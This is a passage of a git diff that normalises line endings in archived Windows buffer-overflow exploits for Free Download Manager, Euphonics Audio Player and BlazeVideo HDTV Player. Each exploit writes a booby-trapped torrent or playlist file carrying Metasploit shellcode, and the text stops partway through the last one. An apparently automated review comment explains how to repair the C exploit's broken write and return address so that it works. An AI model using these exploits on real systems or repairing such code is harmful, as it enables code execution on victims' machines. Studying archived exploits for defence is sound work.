-# I have been able to do this because of my recent experiences with
-# UNICODE based overflows (heap & stack). This is a demonstration
-# of how you can obtain power with limitations to buffer.
-# Of course I could have used my shellhunting technique,
-# but this is a new method, and to demonstrate it in a world of
-# dying buffer overflows is important for me.
-#
-# Unfortunately I did not have time to make this a universal exploit
-# so it will only work on all NT systems EXCEPT Vista (due to randomized
-# heap, etc). But with a few modifications it can work (sure of it).
-# Read my notes & comments in the script for more info.
-#
-# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
-#
-# Note: Author has no responsibility over the damage you do with this!
-
-use strict;
-use warnings;
-
-my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
- "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
- "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
- "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A"; -my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73". - "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65"; - -# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode = -"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49". -#Notice I added 0x01 byte before each 0x80=> byte. -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47". -"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38". -"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48". -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". -"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58". -"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37". -"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a". -"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". -"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53". -"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37". -"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59". -"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x36\x43\x46\x42\x30\x5a"; - -#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does -#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes). -#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add -#0x01 before each 0x80=> byte. -my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3). - ("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2). - ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01"). - ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01"). - ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11). - ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01"); -my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc). -my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location. -my $overflow1 = "\x41" x 10000; -my $overflow2 = "\x41" x $len; -my $sled = "\x41" x (350 - length($shellcode_builder)); -my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;) -my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems) - -open(my $torrent, "> s.torrent"); -print $torrent $tdata1. - $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2. 
- $tdata2; -close $torrent; - -# milw0rm.com [2009-02-03] +#!/usr/bin/perl +# +# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit +# ----------------------------------------------------------- +# Exploit by SkD (skdrat@hotmail.com) +# +# Vendors URL = +# [www.freedownloadmanager.org] +# Download FDM 3.0 Build 844 = +# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html] +# (Downloaded by over 1.6 million users!) +# +# This is another one of the more advanced exploitation methods +# for buffer overflows using my method called "shell building". +# It utilizes a SEH overflow and then a shellcode builder/assembler +# "builds"/or "assembles" bytes that were deleted by transformation +# of the buffer so that the shellcode will work without a flaw. +# I have been able to do this because of my recent experiences with +# UNICODE based overflows (heap & stack). This is a demonstration +# of how you can obtain power with limitations to buffer. +# Of course I could have used my shellhunting technique, +# but this is a new method, and to demonstrate it in a world of +# dying buffer overflows is important for me. +# +# Unfortunately I did not have time to make this a universal exploit +# so it will only work on all NT systems EXCEPT Vista (due to randomized +# heap, etc). But with a few modifications it can work (sure of it). +# Read my notes & comments in the script for more info. +# +# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4. +# +# Note: Author has no responsibility over the damage you do with this! + +use strict; +use warnings; + +my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D". + "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20". + "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68". 
+ "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A"; +my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73". + "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65"; + +# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode = +"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49". +#Notice I added 0x01 byte before each 0x80=> byte. +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47". +"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38". +"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48". +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". +"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58". +"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37". +"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a". +"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". +"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53". +"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37". +"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59". +"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
+"\x4e\x36\x43\x46\x42\x30\x5a"; + +#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does +#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes). +#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add +#0x01 before each 0x80=> byte. +my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3). + ("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2). + ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01"). + ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01"). + ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11). + ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01"); +my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc). +my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location. +my $overflow1 = "\x41" x 10000; +my $overflow2 = "\x41" x $len; +my $sled = "\x41" x (350 - length($shellcode_builder)); +my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;) +my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems) + +open(my $torrent, "> s.torrent"); +print $torrent $tdata1. + $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2. + $tdata2; +close $torrent; + +# milw0rm.com [2009-02-03] diff --git a/platforms/windows/local/7973.pl b/platforms/windows/local/7973.pl index 7ce59259d..bfd9ab3a4 100755 --- a/platforms/windows/local/7973.pl 
+++ b/platforms/windows/local/7973.pl 
@@ -1,38 +1,38 @@
-#!/usr/bin/perl -w
-#-----------------------------------------------------------------------------
-# Author : Houssamix
-
-# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
-# Gr33tz to : str0ke , real-power.net , Legend-spy - stack
-
-# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
-# just the ret adress is changed for make the exploit universal
-
-#-----------------------------------------------------------------------------
-my $overflow = "\x41" x 1324;
-my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll <= universal adress
-my $nop = "\x90" x 100 ;
-
-# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
-my $shellcode =
-"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
-"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
-"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
-"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
-"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
-"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
-"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
-"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
-"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
-"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
-"\x51\x92\x42\x83";
-
-my $file="hsmx.pls";
-
-$exploit = $overflow.$ret.$nop.$shellcode;
-open(my $FILE, ">>$file") or die "Cannot open $file: $!";
-print $FILE $exploit ;
-close($FILE);
-print "Done \n";
-
-# milw0rm.com [2009-02-04]
+#!/usr/bin/perl -w
+#-----------------------------------------------------------------------------
+# Author : Houssamix
+
+# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
+# Gr33tz to : str0ke , real-power.net , Legend-spy - stack
+
+# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
+# just the ret adress is changed for make the exploit universal
+
+#-----------------------------------------------------------------------------
+my $overflow = "\x41" x 1324;
+my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll <= universal adress
+my $nop = "\x90" x 100 ;
+
+# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
+my $shellcode =
+"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
+"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
+"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
+"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
+"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
+"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
+"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
+"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
+"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
+"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
+"\x51\x92\x42\x83";
+
+my $file="hsmx.pls";
+
+$exploit = $overflow.$ret.$nop.$shellcode;
+open(my $FILE, ">>$file") or die "Cannot open $file: $!";
+print $FILE $exploit ;
+close($FILE);
+print "Done \n";
+
+# milw0rm.com [2009-02-04]
diff --git a/platforms/windows/local/7974.c b/platforms/windows/local/7974.c
index ba1dd6a90..4871182ca 100755
--- a/platforms/windows/local/7974.c
+++ b/platforms/windows/local/7974.c
@@ -1,42 +1,42 @@
-#include <stdio.h>
-#include <windows.h>
-#include <string.h>
-#define overflow 1324
-#define NOP 0x90
-#define pls "Eye.pls"
-
-int main (int argc,char **argv)
-{
-char winsp3[] = "\x7B\x46\x86\x7C";
-char buffer[overflow];
-FILE *Player;
-
-unsigned char shellcode[] =
-"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
-"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
-"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
-"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
-"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
-"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
-"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
-"\x9c\x8a\xd0\x39\x84\x9e\x96\xbb\x67\x16\xcd\xb2\xec\x96\xf6\xda"
-"\xd0\xc9\x4c\x44\x8c\xc0\xf4\x4a\x6f\x56\x06\xe2\x84\x66\xf7\xb6"
-"\xb3\xfe\xe5\x4c\x66\x98\x2a\x4d\x0b\xf5\x1c\xde\x8f\xb8\x18\xca"
-"\x89\x96\x7d\xb2";
-
-printf("\n******************************************");
-printf("\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *");
-printf("\n* THIS BUG C0DED BY SINGLE EYE *");
-printf("\n* SPECIAL THANKS TO STR0KE *");
-printf("\n******************************************");
-memset(buffer,NOP,overflow);
-memcpy(buffer,shellcode,sizeof(shellcode)-1);
-buffer[overflow] = 0;
-Player = fopen(pls,"w+");
-fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
-fclose(Player);
-printf("\n DOne Poc !!");
-return 0;
-}
-
-// milw0rm.com [2009-02-04]
+#include <stdio.h>
+#include <windows.h>
+#include <string.h>
+#define overflow 1324
+#define NOP 0x90
+#define pls "Eye.pls"
+
+int main (int argc,char **argv)
+{
+char winsp3[] = "\x7B\x46\x86\x7C";
+char buffer[overflow];
+FILE *Player;
+
+unsigned char shellcode[] =
+"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
+"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
+"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
+"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
+"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
+"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
+"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
+"\x9c\x8a\xd0\x39\x84\x9e\x96\xbb\x67\x16\xcd\xb2\xec\x96\xf6\xda"
+"\xd0\xc9\x4c\x44\x8c\xc0\xf4\x4a\x6f\x56\x06\xe2\x84\x66\xf7\xb6"
+"\xb3\xfe\xe5\x4c\x66\x98\x2a\x4d\x0b\xf5\x1c\xde\x8f\xb8\x18\xca"
+"\x89\x96\x7d\xb2";
+
+printf("\n******************************************");
+printf("\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *");
+printf("\n* THIS BUG C0DED BY SINGLE EYE *");
+printf("\n* SPECIAL THANKS TO STR0KE *");
+printf("\n******************************************");
+memset(buffer,NOP,overflow);
+memcpy(buffer,shellcode,sizeof(shellcode)-1);
+buffer[overflow] = 0;
+Player = fopen(pls,"w+");
+fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
+fclose(Player);
+printf("\n DOne Poc !!");
+return 0;
+}
+
+// milw0rm.com [2009-02-04]
diff --git a/platforms/windows/local/7975.py b/platforms/windows/local/7975.py
index 69ea3a3de..892c18edd 100755
--- a/platforms/windows/local/7975.py
+++ b/platforms/windows/local/7975.py
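Review bot: `fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);` in main() on the new side passes the FILE pointer as the data argument, so Eye.pls receives 1324 bytes read from the FILE object (and beyond it) rather than the prepared buffer; it should be `fwrite(buffer,sizeof(unsigned char),sizeof(buffer),Player);`. The preceding `buffer[overflow] = 0;` stores one byte past the end of `char buffer[overflow]`, a stack out-of-bounds write that serves no purpose once fwrite is given the explicit length, so it should be dropped. `winsp3` (apparently the intended return address) is declared but never copied into the buffer, and the result of `fopen(pls,"w+")` is used without a NULL check; presumably the address was meant to follow the padding as the sibling 7973.pl does, but that is inferred rather than shown. The hunk itself only changes line endings, so these are pre-existing defects in the file being normalized.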
@@ -1,82 +1,82 @@ -#!/usr/bin/python -# -# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit -# -# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV -# Player software, combining HDTV playback, FM receiving, video record and DVD playback -# functions. You can make advantage of PC monitor's high resolution, watch, record, playback -# high definition HDTV program or teletext broadcast program. -# -# Product web page: http://www.blazevideo.com/hdtv-player/index.htm -# -# Tested on Microsoft Windows XP Professional SP2 (English) -# -# ------------------------------------windbg------------------------------------ -# -# (620.d74): Access violation - code c0000005 (first chance) -# First chance exceptions are reported before any exception handling. -# This exception may be expected and handled. -# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001 -# eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc -# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 -# 43434343 ?? ??? 
-# -#-------------------------------------------------------------------------------- -# -# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic -# -# liquidworm [t00t] gmail [w00t] com -# -# http://www.zeroscience.org/ -# -# 03.01.2009 -# - - -print "--------------------------------------------------------------------------" -print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit\n" -print "\t\t\tby LiquidWorm [liquidworm[t00t]gmail.com] - 2009\n" -print "--------------------------------------------------------------------------" - -buffer = "\x41" * 260 - -eip = "\xc0\x25\x49\x7e" #jmp esp user32.dll - -nop = "\x90" * 15 - -# win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x48\x6a\x65" - "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x75\x32\x41\x42\x32\x42" - "\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x39\x79\x6b\x4c\x4a" - "\x48\x47\x34\x43\x30\x45\x50\x57\x70\x4c\x4b\x71\x55\x77\x4c\x4c" - "\x4b\x71\x6c\x37\x75\x30\x78\x75\x51\x78\x6f\x4c\x4b\x52\x6f\x32" - "\x38\x4c\x4b\x63\x6f\x45\x70\x55\x51\x5a\x4b\x31\x59\x6c\x4b\x44" - "\x74\x6c\x4b\x55\x51\x4a\x4e\x76\x51\x49\x50\x6d\x49\x4c\x6c\x4e" - "\x64\x6f\x30\x30\x74\x43\x37\x7a\x61\x59\x5a\x36\x6d\x46\x61\x6a" - "\x62\x58\x6b\x7a\x54\x45\x6b\x76\x34\x47\x54\x64\x44\x53\x45\x79" - "\x75\x4c\x4b\x63\x6f\x51\x34\x67\x71\x4a\x4b\x50\x66\x4c\x4b\x76" - "\x6c\x30\x4b\x4c\x4b\x43\x6f\x67\x6c\x34\x41\x58\x6b\x6e\x6b\x75" - "\x4c\x6c\x4b\x37\x71\x38\x6b\x6c\x49\x63\x6c\x54\x64\x44\x44\x79" - "\x53\x50\x31\x69\x50\x63\x54\x4c\x4b\x63\x70\x34\x70\x4b\x35\x4f" - "\x30\x53\x48\x56\x6c\x6e\x6b\x71\x50\x76\x6c\x4c\x4b\x34\x30\x45" - "\x4c\x4c\x6d\x4e\x6b\x50\x68\x55\x58\x5a\x4b\x54\x49\x4c\x4b\x6f" - "\x70\x4e\x50\x55\x50\x63\x30\x75\x50\x4c\x4b\x72\x48\x55\x6c\x71" - 
"\x4f\x45\x61\x39\x66\x41\x70\x72\x76\x4f\x79\x6b\x48\x4d\x53\x4f" - "\x30\x73\x4b\x50\x50\x50\x68\x6a\x4f\x48\x4e\x6d\x30\x43\x50\x62" - "\x48\x6f\x68\x4b\x4e\x4f\x7a\x74\x4e\x46\x37\x39\x6f\x69\x77\x41" - "\x63\x50\x6f\x70\x6c\x75\x50\x65" - ) - -payload = garbage + eip + nop + shellcode + nop - -try: - out_file = open("Groundhog_Day.plf",'w') - out_file.write(payload) - out_file.close() - raw_input("\n\n[*] Evil playlist successfully created.\n\nPress any key to continue...") -except: - print "Oops!" - -# milw0rm.com [2009-02-04] +#!/usr/bin/python +# +# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit +# +# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV +# Player software, combining HDTV playback, FM receiving, video record and DVD playback +# functions. You can make advantage of PC monitor's high resolution, watch, record, playback +# high definition HDTV program or teletext broadcast program. +# +# Product web page: http://www.blazevideo.com/hdtv-player/index.htm +# +# Tested on Microsoft Windows XP Professional SP2 (English) +# +# ------------------------------------windbg------------------------------------ +# +# (620.d74): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001 +# eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc +# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 +# 43434343 ?? ??? 
+# +#-------------------------------------------------------------------------------- +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# +# liquidworm [t00t] gmail [w00t] com +# +# http://www.zeroscience.org/ +# +# 03.01.2009 +# + + +print "--------------------------------------------------------------------------" +print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit\n" +print "\t\t\tby LiquidWorm [liquidworm[t00t]gmail.com] - 2009\n" +print "--------------------------------------------------------------------------" + +buffer = "\x41" * 260 + +eip = "\xc0\x25\x49\x7e" #jmp esp user32.dll + +nop = "\x90" * 15 + +# win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com +shellcode = ( + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x48\x6a\x65" + "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x75\x32\x41\x42\x32\x42" + "\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x39\x79\x6b\x4c\x4a" + "\x48\x47\x34\x43\x30\x45\x50\x57\x70\x4c\x4b\x71\x55\x77\x4c\x4c" + "\x4b\x71\x6c\x37\x75\x30\x78\x75\x51\x78\x6f\x4c\x4b\x52\x6f\x32" + "\x38\x4c\x4b\x63\x6f\x45\x70\x55\x51\x5a\x4b\x31\x59\x6c\x4b\x44" + "\x74\x6c\x4b\x55\x51\x4a\x4e\x76\x51\x49\x50\x6d\x49\x4c\x6c\x4e" + 